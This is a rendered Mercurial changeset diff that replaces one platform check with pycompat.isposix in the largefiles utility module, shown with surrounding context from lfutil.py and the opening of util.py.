##// END OF EJS Templates
codemod: use pycompat.isposix...
Jun Wu -
r34647:238abf65 default
parent child Browse files
Show More
@@ -1,673 +1,673 b''
1 1 # Copyright 2009-2010 Gregory P. Ward
2 2 # Copyright 2009-2010 Intelerad Medical Systems Incorporated
3 3 # Copyright 2010-2011 Fog Creek Software
4 4 # Copyright 2010-2011 Unity Technologies
5 5 #
6 6 # This software may be used and distributed according to the terms of the
7 7 # GNU General Public License version 2 or any later version.
8 8
9 9 '''largefiles utility code: must not import other modules in this package.'''
10 10 from __future__ import absolute_import
11 11
12 12 import copy
13 13 import hashlib
14 14 import os
15 15 import stat
16 16
17 17 from mercurial.i18n import _
18 18
19 19 from mercurial import (
20 20 dirstate,
21 21 encoding,
22 22 error,
23 23 httpconnection,
24 24 match as matchmod,
25 25 node,
26 26 pycompat,
27 27 scmutil,
28 28 sparse,
29 29 util,
30 30 vfs as vfsmod,
31 31 )
32 32
33 33 shortname = '.hglf'
34 34 shortnameslash = shortname + '/'
35 35 longname = 'largefiles'
36 36
37 37 # -- Private worker functions ------------------------------------------
38 38
39 39 def getminsize(ui, assumelfiles, opt, default=10):
40 40 lfsize = opt
41 41 if not lfsize and assumelfiles:
42 42 lfsize = ui.config(longname, 'minsize', default=default)
43 43 if lfsize:
44 44 try:
45 45 lfsize = float(lfsize)
46 46 except ValueError:
47 47 raise error.Abort(_('largefiles: size must be number (not %s)\n')
48 48 % lfsize)
49 49 if lfsize is None:
50 50 raise error.Abort(_('minimum size for largefiles must be specified'))
51 51 return lfsize
52 52
53 53 def link(src, dest):
54 54 """Try to create hardlink - if that fails, efficiently make a copy."""
55 55 util.makedirs(os.path.dirname(dest))
56 56 try:
57 57 util.oslink(src, dest)
58 58 except OSError:
59 59 # if hardlinks fail, fallback on atomic copy
60 60 with open(src, 'rb') as srcf, util.atomictempfile(dest) as dstf:
61 61 for chunk in util.filechunkiter(srcf):
62 62 dstf.write(chunk)
63 63 os.chmod(dest, os.stat(src).st_mode)
64 64
65 65 def usercachepath(ui, hash):
66 66 '''Return the correct location in the "global" largefiles cache for a file
67 67 with the given hash.
68 68 This cache is used for sharing of largefiles across repositories - both
69 69 to preserve download bandwidth and storage space.'''
70 70 return os.path.join(_usercachedir(ui), hash)
71 71
72 72 def _usercachedir(ui):
73 73 '''Return the location of the "global" largefiles cache.'''
74 74 path = ui.configpath(longname, 'usercache', None)
75 75 if path:
76 76 return path
77 77 if pycompat.iswindows:
78 78 appdata = encoding.environ.get('LOCALAPPDATA',\
79 79 encoding.environ.get('APPDATA'))
80 80 if appdata:
81 81 return os.path.join(appdata, longname)
82 82 elif pycompat.sysplatform == 'darwin':
83 83 home = encoding.environ.get('HOME')
84 84 if home:
85 85 return os.path.join(home, 'Library', 'Caches', longname)
86 elif pycompat.osname == 'posix':
86 elif pycompat.isposix:
87 87 path = encoding.environ.get('XDG_CACHE_HOME')
88 88 if path:
89 89 return os.path.join(path, longname)
90 90 home = encoding.environ.get('HOME')
91 91 if home:
92 92 return os.path.join(home, '.cache', longname)
93 93 else:
94 94 raise error.Abort(_('unknown operating system: %s\n')
95 95 % pycompat.osname)
96 96 raise error.Abort(_('unknown %s usercache location') % longname)
97 97
98 98 def inusercache(ui, hash):
99 99 path = usercachepath(ui, hash)
100 100 return os.path.exists(path)
101 101
102 102 def findfile(repo, hash):
103 103 '''Return store path of the largefile with the specified hash.
104 104 As a side effect, the file might be linked from user cache.
105 105 Return None if the file can't be found locally.'''
106 106 path, exists = findstorepath(repo, hash)
107 107 if exists:
108 108 repo.ui.note(_('found %s in store\n') % hash)
109 109 return path
110 110 elif inusercache(repo.ui, hash):
111 111 repo.ui.note(_('found %s in system cache\n') % hash)
112 112 path = storepath(repo, hash)
113 113 link(usercachepath(repo.ui, hash), path)
114 114 return path
115 115 return None
116 116
117 117 class largefilesdirstate(dirstate.dirstate):
118 118 def __getitem__(self, key):
119 119 return super(largefilesdirstate, self).__getitem__(unixpath(key))
120 120 def normal(self, f):
121 121 return super(largefilesdirstate, self).normal(unixpath(f))
122 122 def remove(self, f):
123 123 return super(largefilesdirstate, self).remove(unixpath(f))
124 124 def add(self, f):
125 125 return super(largefilesdirstate, self).add(unixpath(f))
126 126 def drop(self, f):
127 127 return super(largefilesdirstate, self).drop(unixpath(f))
128 128 def forget(self, f):
129 129 return super(largefilesdirstate, self).forget(unixpath(f))
130 130 def normallookup(self, f):
131 131 return super(largefilesdirstate, self).normallookup(unixpath(f))
132 132 def _ignore(self, f):
133 133 return False
134 134 def write(self, tr=False):
135 135 # (1) disable PENDING mode always
136 136 # (lfdirstate isn't yet managed as a part of the transaction)
137 137 # (2) avoid develwarn 'use dirstate.write with ....'
138 138 super(largefilesdirstate, self).write(None)
139 139
140 140 def openlfdirstate(ui, repo, create=True):
141 141 '''
142 142 Return a dirstate object that tracks largefiles: i.e. its root is
143 143 the repo root, but it is saved in .hg/largefiles/dirstate.
144 144 '''
145 145 vfs = repo.vfs
146 146 lfstoredir = longname
147 147 opener = vfsmod.vfs(vfs.join(lfstoredir))
148 148 lfdirstate = largefilesdirstate(opener, ui, repo.root,
149 149 repo.dirstate._validate,
150 150 lambda: sparse.matcher(repo))
151 151
152 152 # If the largefiles dirstate does not exist, populate and create
153 153 # it. This ensures that we create it on the first meaningful
154 154 # largefiles operation in a new clone.
155 155 if create and not vfs.exists(vfs.join(lfstoredir, 'dirstate')):
156 156 matcher = getstandinmatcher(repo)
157 157 standins = repo.dirstate.walk(matcher, subrepos=[], unknown=False,
158 158 ignored=False)
159 159
160 160 if len(standins) > 0:
161 161 vfs.makedirs(lfstoredir)
162 162
163 163 for standin in standins:
164 164 lfile = splitstandin(standin)
165 165 lfdirstate.normallookup(lfile)
166 166 return lfdirstate
167 167
168 168 def lfdirstatestatus(lfdirstate, repo):
169 169 pctx = repo['.']
170 170 match = matchmod.always(repo.root, repo.getcwd())
171 171 unsure, s = lfdirstate.status(match, subrepos=[], ignored=False,
172 172 clean=False, unknown=False)
173 173 modified, clean = s.modified, s.clean
174 174 for lfile in unsure:
175 175 try:
176 176 fctx = pctx[standin(lfile)]
177 177 except LookupError:
178 178 fctx = None
179 179 if not fctx or readasstandin(fctx) != hashfile(repo.wjoin(lfile)):
180 180 modified.append(lfile)
181 181 else:
182 182 clean.append(lfile)
183 183 lfdirstate.normal(lfile)
184 184 return s
185 185
186 186 def listlfiles(repo, rev=None, matcher=None):
187 187 '''return a list of largefiles in the working copy or the
188 188 specified changeset'''
189 189
190 190 if matcher is None:
191 191 matcher = getstandinmatcher(repo)
192 192
193 193 # ignore unknown files in working directory
194 194 return [splitstandin(f)
195 195 for f in repo[rev].walk(matcher)
196 196 if rev is not None or repo.dirstate[f] != '?']
197 197
198 198 def instore(repo, hash, forcelocal=False):
199 199 '''Return true if a largefile with the given hash exists in the store'''
200 200 return os.path.exists(storepath(repo, hash, forcelocal))
201 201
202 202 def storepath(repo, hash, forcelocal=False):
203 203 '''Return the correct location in the repository largefiles store for a
204 204 file with the given hash.'''
205 205 if not forcelocal and repo.shared():
206 206 return repo.vfs.reljoin(repo.sharedpath, longname, hash)
207 207 return repo.vfs.join(longname, hash)
208 208
209 209 def findstorepath(repo, hash):
210 210 '''Search through the local store path(s) to find the file for the given
211 211 hash. If the file is not found, its path in the primary store is returned.
212 212 The return value is a tuple of (path, exists(path)).
213 213 '''
214 214 # For shared repos, the primary store is in the share source. But for
215 215 # backward compatibility, force a lookup in the local store if it wasn't
216 216 # found in the share source.
217 217 path = storepath(repo, hash, False)
218 218
219 219 if instore(repo, hash):
220 220 return (path, True)
221 221 elif repo.shared() and instore(repo, hash, True):
222 222 return storepath(repo, hash, True), True
223 223
224 224 return (path, False)
225 225
226 226 def copyfromcache(repo, hash, filename):
227 227 '''Copy the specified largefile from the repo or system cache to
228 228 filename in the repository. Return true on success or false if the
229 229 file was not found in either cache (which should not happened:
230 230 this is meant to be called only after ensuring that the needed
231 231 largefile exists in the cache).'''
232 232 wvfs = repo.wvfs
233 233 path = findfile(repo, hash)
234 234 if path is None:
235 235 return False
236 236 wvfs.makedirs(wvfs.dirname(wvfs.join(filename)))
237 237 # The write may fail before the file is fully written, but we
238 238 # don't use atomic writes in the working copy.
239 239 with open(path, 'rb') as srcfd, wvfs(filename, 'wb') as destfd:
240 240 gothash = copyandhash(
241 241 util.filechunkiter(srcfd), destfd)
242 242 if gothash != hash:
243 243 repo.ui.warn(_('%s: data corruption in %s with hash %s\n')
244 244 % (filename, path, gothash))
245 245 wvfs.unlink(filename)
246 246 return False
247 247 return True
248 248
249 249 def copytostore(repo, ctx, file, fstandin):
250 250 wvfs = repo.wvfs
251 251 hash = readasstandin(ctx[fstandin])
252 252 if instore(repo, hash):
253 253 return
254 254 if wvfs.exists(file):
255 255 copytostoreabsolute(repo, wvfs.join(file), hash)
256 256 else:
257 257 repo.ui.warn(_("%s: largefile %s not available from local store\n") %
258 258 (file, hash))
259 259
260 260 def copyalltostore(repo, node):
261 261 '''Copy all largefiles in a given revision to the store'''
262 262
263 263 ctx = repo[node]
264 264 for filename in ctx.files():
265 265 realfile = splitstandin(filename)
266 266 if realfile is not None and filename in ctx.manifest():
267 267 copytostore(repo, ctx, realfile, filename)
268 268
269 269 def copytostoreabsolute(repo, file, hash):
270 270 if inusercache(repo.ui, hash):
271 271 link(usercachepath(repo.ui, hash), storepath(repo, hash))
272 272 else:
273 273 util.makedirs(os.path.dirname(storepath(repo, hash)))
274 274 with open(file, 'rb') as srcf:
275 275 with util.atomictempfile(storepath(repo, hash),
276 276 createmode=repo.store.createmode) as dstf:
277 277 for chunk in util.filechunkiter(srcf):
278 278 dstf.write(chunk)
279 279 linktousercache(repo, hash)
280 280
281 281 def linktousercache(repo, hash):
282 282 '''Link / copy the largefile with the specified hash from the store
283 283 to the cache.'''
284 284 path = usercachepath(repo.ui, hash)
285 285 link(storepath(repo, hash), path)
286 286
287 287 def getstandinmatcher(repo, rmatcher=None):
288 288 '''Return a match object that applies rmatcher to the standin directory'''
289 289 wvfs = repo.wvfs
290 290 standindir = shortname
291 291
292 292 # no warnings about missing files or directories
293 293 badfn = lambda f, msg: None
294 294
295 295 if rmatcher and not rmatcher.always():
296 296 pats = [wvfs.join(standindir, pat) for pat in rmatcher.files()]
297 297 if not pats:
298 298 pats = [wvfs.join(standindir)]
299 299 match = scmutil.match(repo[None], pats, badfn=badfn)
300 300 else:
301 301 # no patterns: relative to repo root
302 302 match = scmutil.match(repo[None], [wvfs.join(standindir)], badfn=badfn)
303 303 return match
304 304
305 305 def composestandinmatcher(repo, rmatcher):
306 306 '''Return a matcher that accepts standins corresponding to the
307 307 files accepted by rmatcher. Pass the list of files in the matcher
308 308 as the paths specified by the user.'''
309 309 smatcher = getstandinmatcher(repo, rmatcher)
310 310 isstandin = smatcher.matchfn
311 311 def composedmatchfn(f):
312 312 return isstandin(f) and rmatcher.matchfn(splitstandin(f))
313 313 smatcher.matchfn = composedmatchfn
314 314
315 315 return smatcher
316 316
317 317 def standin(filename):
318 318 '''Return the repo-relative path to the standin for the specified big
319 319 file.'''
320 320 # Notes:
321 321 # 1) Some callers want an absolute path, but for instance addlargefiles
322 322 # needs it repo-relative so it can be passed to repo[None].add(). So
323 323 # leave it up to the caller to use repo.wjoin() to get an absolute path.
324 324 # 2) Join with '/' because that's what dirstate always uses, even on
325 325 # Windows. Change existing separator to '/' first in case we are
326 326 # passed filenames from an external source (like the command line).
327 327 return shortnameslash + util.pconvert(filename)
328 328
329 329 def isstandin(filename):
330 330 '''Return true if filename is a big file standin. filename must be
331 331 in Mercurial's internal form (slash-separated).'''
332 332 return filename.startswith(shortnameslash)
333 333
334 334 def splitstandin(filename):
335 335 # Split on / because that's what dirstate always uses, even on Windows.
336 336 # Change local separator to / first just in case we are passed filenames
337 337 # from an external source (like the command line).
338 338 bits = util.pconvert(filename).split('/', 1)
339 339 if len(bits) == 2 and bits[0] == shortname:
340 340 return bits[1]
341 341 else:
342 342 return None
343 343
344 344 def updatestandin(repo, lfile, standin):
345 345 """Re-calculate hash value of lfile and write it into standin
346 346
347 347 This assumes that "lfutil.standin(lfile) == standin", for efficiency.
348 348 """
349 349 file = repo.wjoin(lfile)
350 350 if repo.wvfs.exists(lfile):
351 351 hash = hashfile(file)
352 352 executable = getexecutable(file)
353 353 writestandin(repo, standin, hash, executable)
354 354 else:
355 355 raise error.Abort(_('%s: file not found!') % lfile)
356 356
357 357 def readasstandin(fctx):
358 358 '''read hex hash from given filectx of standin file
359 359
360 360 This encapsulates how "standin" data is stored into storage layer.'''
361 361 return fctx.data().strip()
362 362
363 363 def writestandin(repo, standin, hash, executable):
364 364 '''write hash to <repo.root>/<standin>'''
365 365 repo.wwrite(standin, hash + '\n', executable and 'x' or '')
366 366
367 367 def copyandhash(instream, outfile):
368 368 '''Read bytes from instream (iterable) and write them to outfile,
369 369 computing the SHA-1 hash of the data along the way. Return the hash.'''
370 370 hasher = hashlib.sha1('')
371 371 for data in instream:
372 372 hasher.update(data)
373 373 outfile.write(data)
374 374 return hasher.hexdigest()
375 375
376 376 def hashfile(file):
377 377 if not os.path.exists(file):
378 378 return ''
379 379 with open(file, 'rb') as fd:
380 380 return hexsha1(fd)
381 381
382 382 def getexecutable(filename):
383 383 mode = os.stat(filename).st_mode
384 384 return ((mode & stat.S_IXUSR) and
385 385 (mode & stat.S_IXGRP) and
386 386 (mode & stat.S_IXOTH))
387 387
388 388 def urljoin(first, second, *arg):
389 389 def join(left, right):
390 390 if not left.endswith('/'):
391 391 left += '/'
392 392 if right.startswith('/'):
393 393 right = right[1:]
394 394 return left + right
395 395
396 396 url = join(first, second)
397 397 for a in arg:
398 398 url = join(url, a)
399 399 return url
400 400
401 401 def hexsha1(fileobj):
402 402 """hexsha1 returns the hex-encoded sha1 sum of the data in the file-like
403 403 object data"""
404 404 h = hashlib.sha1()
405 405 for chunk in util.filechunkiter(fileobj):
406 406 h.update(chunk)
407 407 return h.hexdigest()
408 408
409 409 def httpsendfile(ui, filename):
410 410 return httpconnection.httpsendfile(ui, filename, 'rb')
411 411
412 412 def unixpath(path):
413 413 '''Return a version of path normalized for use with the lfdirstate.'''
414 414 return util.pconvert(os.path.normpath(path))
415 415
416 416 def islfilesrepo(repo):
417 417 '''Return true if the repo is a largefile repo.'''
418 418 if ('largefiles' in repo.requirements and
419 419 any(shortnameslash in f[0] for f in repo.store.datafiles())):
420 420 return True
421 421
422 422 return any(openlfdirstate(repo.ui, repo, False))
423 423
424 424 class storeprotonotcapable(Exception):
425 425 def __init__(self, storetypes):
426 426 self.storetypes = storetypes
427 427
428 428 def getstandinsstate(repo):
429 429 standins = []
430 430 matcher = getstandinmatcher(repo)
431 431 wctx = repo[None]
432 432 for standin in repo.dirstate.walk(matcher, subrepos=[], unknown=False,
433 433 ignored=False):
434 434 lfile = splitstandin(standin)
435 435 try:
436 436 hash = readasstandin(wctx[standin])
437 437 except IOError:
438 438 hash = None
439 439 standins.append((lfile, hash))
440 440 return standins
441 441
442 442 def synclfdirstate(repo, lfdirstate, lfile, normallookup):
443 443 lfstandin = standin(lfile)
444 444 if lfstandin in repo.dirstate:
445 445 stat = repo.dirstate._map[lfstandin]
446 446 state, mtime = stat[0], stat[3]
447 447 else:
448 448 state, mtime = '?', -1
449 449 if state == 'n':
450 450 if (normallookup or mtime < 0 or
451 451 not repo.wvfs.exists(lfile)):
452 452 # state 'n' doesn't ensure 'clean' in this case
453 453 lfdirstate.normallookup(lfile)
454 454 else:
455 455 lfdirstate.normal(lfile)
456 456 elif state == 'm':
457 457 lfdirstate.normallookup(lfile)
458 458 elif state == 'r':
459 459 lfdirstate.remove(lfile)
460 460 elif state == 'a':
461 461 lfdirstate.add(lfile)
462 462 elif state == '?':
463 463 lfdirstate.drop(lfile)
464 464
465 465 def markcommitted(orig, ctx, node):
466 466 repo = ctx.repo()
467 467
468 468 orig(node)
469 469
470 470 # ATTENTION: "ctx.files()" may differ from "repo[node].files()"
471 471 # because files coming from the 2nd parent are omitted in the latter.
472 472 #
473 473 # The former should be used to get targets of "synclfdirstate",
474 474 # because such files:
475 475 # - are marked as "a" by "patch.patch()" (e.g. via transplant), and
476 476 # - have to be marked as "n" after commit, but
477 477 # - aren't listed in "repo[node].files()"
478 478
479 479 lfdirstate = openlfdirstate(repo.ui, repo)
480 480 for f in ctx.files():
481 481 lfile = splitstandin(f)
482 482 if lfile is not None:
483 483 synclfdirstate(repo, lfdirstate, lfile, False)
484 484 lfdirstate.write()
485 485
486 486 # As part of committing, copy all of the largefiles into the cache.
487 487 #
488 488 # Using "node" instead of "ctx" implies additional "repo[node]"
489 489 # lookup while copyalltostore(), but can omit redundant check for
490 490 # files comming from the 2nd parent, which should exist in store
491 491 # at merging.
492 492 copyalltostore(repo, node)
493 493
494 494 def getlfilestoupdate(oldstandins, newstandins):
495 495 changedstandins = set(oldstandins).symmetric_difference(set(newstandins))
496 496 filelist = []
497 497 for f in changedstandins:
498 498 if f[0] not in filelist:
499 499 filelist.append(f[0])
500 500 return filelist
501 501
502 502 def getlfilestoupload(repo, missing, addfunc):
503 503 for i, n in enumerate(missing):
504 504 repo.ui.progress(_('finding outgoing largefiles'), i,
505 505 unit=_('revisions'), total=len(missing))
506 506 parents = [p for p in repo[n].parents() if p != node.nullid]
507 507
508 508 oldlfstatus = repo.lfstatus
509 509 repo.lfstatus = False
510 510 try:
511 511 ctx = repo[n]
512 512 finally:
513 513 repo.lfstatus = oldlfstatus
514 514
515 515 files = set(ctx.files())
516 516 if len(parents) == 2:
517 517 mc = ctx.manifest()
518 518 mp1 = ctx.parents()[0].manifest()
519 519 mp2 = ctx.parents()[1].manifest()
520 520 for f in mp1:
521 521 if f not in mc:
522 522 files.add(f)
523 523 for f in mp2:
524 524 if f not in mc:
525 525 files.add(f)
526 526 for f in mc:
527 527 if mc[f] != mp1.get(f, None) or mc[f] != mp2.get(f, None):
528 528 files.add(f)
529 529 for fn in files:
530 530 if isstandin(fn) and fn in ctx:
531 531 addfunc(fn, readasstandin(ctx[fn]))
532 532 repo.ui.progress(_('finding outgoing largefiles'), None)
533 533
534 534 def updatestandinsbymatch(repo, match):
535 535 '''Update standins in the working directory according to specified match
536 536
537 537 This returns (possibly modified) ``match`` object to be used for
538 538 subsequent commit process.
539 539 '''
540 540
541 541 ui = repo.ui
542 542
543 543 # Case 1: user calls commit with no specific files or
544 544 # include/exclude patterns: refresh and commit all files that
545 545 # are "dirty".
546 546 if match is None or match.always():
547 547 # Spend a bit of time here to get a list of files we know
548 548 # are modified so we can compare only against those.
549 549 # It can cost a lot of time (several seconds)
550 550 # otherwise to update all standins if the largefiles are
551 551 # large.
552 552 lfdirstate = openlfdirstate(ui, repo)
553 553 dirtymatch = matchmod.always(repo.root, repo.getcwd())
554 554 unsure, s = lfdirstate.status(dirtymatch, subrepos=[], ignored=False,
555 555 clean=False, unknown=False)
556 556 modifiedfiles = unsure + s.modified + s.added + s.removed
557 557 lfiles = listlfiles(repo)
558 558 # this only loops through largefiles that exist (not
559 559 # removed/renamed)
560 560 for lfile in lfiles:
561 561 if lfile in modifiedfiles:
562 562 fstandin = standin(lfile)
563 563 if repo.wvfs.exists(fstandin):
564 564 # this handles the case where a rebase is being
565 565 # performed and the working copy is not updated
566 566 # yet.
567 567 if repo.wvfs.exists(lfile):
568 568 updatestandin(repo, lfile, fstandin)
569 569
570 570 return match
571 571
572 572 lfiles = listlfiles(repo)
573 573 match._files = repo._subdirlfs(match.files(), lfiles)
574 574
575 575 # Case 2: user calls commit with specified patterns: refresh
576 576 # any matching big files.
577 577 smatcher = composestandinmatcher(repo, match)
578 578 standins = repo.dirstate.walk(smatcher, subrepos=[], unknown=False,
579 579 ignored=False)
580 580
581 581 # No matching big files: get out of the way and pass control to
582 582 # the usual commit() method.
583 583 if not standins:
584 584 return match
585 585
586 586 # Refresh all matching big files. It's possible that the
587 587 # commit will end up failing, in which case the big files will
588 588 # stay refreshed. No harm done: the user modified them and
589 589 # asked to commit them, so sooner or later we're going to
590 590 # refresh the standins. Might as well leave them refreshed.
591 591 lfdirstate = openlfdirstate(ui, repo)
592 592 for fstandin in standins:
593 593 lfile = splitstandin(fstandin)
594 594 if lfdirstate[lfile] != 'r':
595 595 updatestandin(repo, lfile, fstandin)
596 596
597 597 # Cook up a new matcher that only matches regular files or
598 598 # standins corresponding to the big files requested by the
599 599 # user. Have to modify _files to prevent commit() from
600 600 # complaining "not tracked" for big files.
601 601 match = copy.copy(match)
602 602 origmatchfn = match.matchfn
603 603
604 604 # Check both the list of largefiles and the list of
605 605 # standins because if a largefile was removed, it
606 606 # won't be in the list of largefiles at this point
607 607 match._files += sorted(standins)
608 608
609 609 actualfiles = []
610 610 for f in match._files:
611 611 fstandin = standin(f)
612 612
613 613 # For largefiles, only one of the normal and standin should be
614 614 # committed (except if one of them is a remove). In the case of a
615 615 # standin removal, drop the normal file if it is unknown to dirstate.
616 616 # Thus, skip plain largefile names but keep the standin.
617 617 if f in lfiles or fstandin in standins:
618 618 if repo.dirstate[fstandin] != 'r':
619 619 if repo.dirstate[f] != 'r':
620 620 continue
621 621 elif repo.dirstate[f] == '?':
622 622 continue
623 623
624 624 actualfiles.append(f)
625 625 match._files = actualfiles
626 626
627 627 def matchfn(f):
628 628 if origmatchfn(f):
629 629 return f not in lfiles
630 630 else:
631 631 return f in standins
632 632
633 633 match.matchfn = matchfn
634 634
635 635 return match
636 636
637 637 class automatedcommithook(object):
638 638 '''Stateful hook to update standins at the 1st commit of resuming
639 639
640 640 For efficiency, updating standins in the working directory should
641 641 be avoided while automated committing (like rebase, transplant and
642 642 so on), because they should be updated before committing.
643 643
644 644 But the 1st commit of resuming automated committing (e.g. ``rebase
645 645 --continue``) should update them, because largefiles may be
646 646 modified manually.
647 647 '''
648 648 def __init__(self, resuming):
649 649 self.resuming = resuming
650 650
651 651 def __call__(self, repo, match):
652 652 if self.resuming:
653 653 self.resuming = False # avoids updating at subsequent commits
654 654 return updatestandinsbymatch(repo, match)
655 655 else:
656 656 return match
657 657
658 658 def getstatuswriter(ui, repo, forcibly=None):
659 659 '''Return the function to write largefiles specific status out
660 660
661 661 If ``forcibly`` is ``None``, this returns the last element of
662 662 ``repo._lfstatuswriters`` as "default" writer function.
663 663
664 664 Otherwise, this returns the function to always write out (or
665 665 ignore if ``not forcibly``) status.
666 666 '''
667 667 if forcibly is None and util.safehasattr(repo, '_largefilesenabled'):
668 668 return repo._lfstatuswriters[-1]
669 669 else:
670 670 if forcibly:
671 671 return ui.status # forcibly WRITE OUT
672 672 else:
673 673 return lambda *msg, **opts: None # forcibly IGNORE
@@ -1,3861 +1,3861 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import itertools
30 30 import mmap
31 31 import os
32 32 import platform as pyplatform
33 33 import re as remod
34 34 import shutil
35 35 import signal
36 36 import socket
37 37 import stat
38 38 import string
39 39 import subprocess
40 40 import sys
41 41 import tempfile
42 42 import textwrap
43 43 import time
44 44 import traceback
45 45 import warnings
46 46 import zlib
47 47
48 48 from . import (
49 49 encoding,
50 50 error,
51 51 i18n,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 empty = pycompat.empty
66 66 httplib = pycompat.httplib
67 67 pickle = pycompat.pickle
68 68 queue = pycompat.queue
69 69 socketserver = pycompat.socketserver
70 70 stderr = pycompat.stderr
71 71 stdin = pycompat.stdin
72 72 stdout = pycompat.stdout
73 73 stringio = pycompat.stringio
74 74 xmlrpclib = pycompat.xmlrpclib
75 75
76 76 httpserver = urllibcompat.httpserver
77 77 urlerr = urllibcompat.urlerr
78 78 urlreq = urllibcompat.urlreq
79 79
80 80 # workaround for win32mbcs
81 81 _filenamebytestr = pycompat.bytestr
82 82
83 83 def isatty(fp):
84 84 try:
85 85 return fp.isatty()
86 86 except AttributeError:
87 87 return False
88 88
89 89 # glibc determines buffering on first write to stdout - if we replace a TTY
90 90 # destined stdout with a pipe destined stdout (e.g. pager), we want line
91 91 # buffering
92 92 if isatty(stdout):
93 93 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
94 94
95 95 if pycompat.iswindows:
96 96 from . import windows as platform
97 97 stdout = platform.winstdout(stdout)
98 98 else:
99 99 from . import posix as platform
100 100
101 101 _ = i18n._
102 102
103 103 bindunixsocket = platform.bindunixsocket
104 104 cachestat = platform.cachestat
105 105 checkexec = platform.checkexec
106 106 checklink = platform.checklink
107 107 copymode = platform.copymode
108 108 executablepath = platform.executablepath
109 109 expandglobs = platform.expandglobs
110 110 explainexit = platform.explainexit
111 111 findexe = platform.findexe
112 112 gethgcmd = platform.gethgcmd
113 113 getuser = platform.getuser
114 114 getpid = os.getpid
115 115 groupmembers = platform.groupmembers
116 116 groupname = platform.groupname
117 117 hidewindow = platform.hidewindow
118 118 isexec = platform.isexec
119 119 isowner = platform.isowner
120 120 listdir = osutil.listdir
121 121 localpath = platform.localpath
122 122 lookupreg = platform.lookupreg
123 123 makedir = platform.makedir
124 124 nlinks = platform.nlinks
125 125 normpath = platform.normpath
126 126 normcase = platform.normcase
127 127 normcasespec = platform.normcasespec
128 128 normcasefallback = platform.normcasefallback
129 129 openhardlinks = platform.openhardlinks
130 130 oslink = platform.oslink
131 131 parsepatchoutput = platform.parsepatchoutput
132 132 pconvert = platform.pconvert
133 133 poll = platform.poll
134 134 popen = platform.popen
135 135 posixfile = platform.posixfile
136 136 quotecommand = platform.quotecommand
137 137 readpipe = platform.readpipe
138 138 rename = platform.rename
139 139 removedirs = platform.removedirs
140 140 samedevice = platform.samedevice
141 141 samefile = platform.samefile
142 142 samestat = platform.samestat
143 143 setbinary = platform.setbinary
144 144 setflags = platform.setflags
145 145 setsignalhandler = platform.setsignalhandler
146 146 shellquote = platform.shellquote
147 147 spawndetached = platform.spawndetached
148 148 split = platform.split
149 149 sshargs = platform.sshargs
150 150 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
151 151 statisexec = platform.statisexec
152 152 statislink = platform.statislink
153 153 testpid = platform.testpid
154 154 umask = platform.umask
155 155 unlink = platform.unlink
156 156 username = platform.username
157 157
158 158 try:
159 159 recvfds = osutil.recvfds
160 160 except AttributeError:
161 161 pass
162 162 try:
163 163 setprocname = osutil.setprocname
164 164 except AttributeError:
165 165 pass
166 166
167 167 # Python compatibility
168 168
169 169 _notset = object()
170 170
171 171 # disable Python's problematic floating point timestamps (issue4836)
172 172 # (Python hypocritically says you shouldn't change this behavior in
173 173 # libraries, and sure enough Mercurial is not a library.)
174 174 os.stat_float_times(False)
175 175
176 176 def safehasattr(thing, attr):
177 177 return getattr(thing, attr, _notset) is not _notset
178 178
179 179 def bytesinput(fin, fout, *args, **kwargs):
180 180 sin, sout = sys.stdin, sys.stdout
181 181 try:
182 182 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
183 183 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
184 184 finally:
185 185 sys.stdin, sys.stdout = sin, sout
186 186
187 187 def bitsfrom(container):
188 188 bits = 0
189 189 for bit in container:
190 190 bits |= bit
191 191 return bits
192 192
193 193 # python 2.6 still have deprecation warning enabled by default. We do not want
194 194 # to display anything to standard user so detect if we are running test and
195 195 # only use python deprecation warning in this case.
196 196 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
197 197 if _dowarn:
198 198 # explicitly unfilter our warning for python 2.7
199 199 #
200 200 # The option of setting PYTHONWARNINGS in the test runner was investigated.
201 201 # However, module name set through PYTHONWARNINGS was exactly matched, so
202 202 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
203 203 # makes the whole PYTHONWARNINGS thing useless for our usecase.
204 204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
205 205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
206 206 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
207 207
208 208 def nouideprecwarn(msg, version, stacklevel=1):
209 209 """Issue an python native deprecation warning
210 210
211 211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
212 212 """
213 213 if _dowarn:
214 214 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
215 215 " update your code.)") % version
216 216 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
217 217
218 218 DIGESTS = {
219 219 'md5': hashlib.md5,
220 220 'sha1': hashlib.sha1,
221 221 'sha512': hashlib.sha512,
222 222 }
223 223 # List of digest types from strongest to weakest
224 224 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
225 225
226 226 for k in DIGESTS_BY_STRENGTH:
227 227 assert k in DIGESTS
228 228
229 229 class digester(object):
230 230 """helper to compute digests.
231 231
232 232 This helper can be used to compute one or more digests given their name.
233 233
